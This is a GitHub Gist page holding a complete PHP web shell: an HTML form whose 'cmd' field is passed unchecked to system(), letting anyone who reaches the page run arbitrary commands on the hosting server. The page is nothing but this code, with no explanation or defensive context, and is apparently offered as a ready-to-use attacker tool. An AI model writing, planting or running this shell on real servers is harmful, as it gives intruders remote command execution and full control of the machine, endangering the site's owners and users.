Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save tngo0508/8dac7947617c430434c522c587be7ae2 to your computer and use it in GitHub Desktop.
Save tngo0508/8dac7947617c430434c522c587be7ae2 to your computer and use it in GitHub Desktop.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment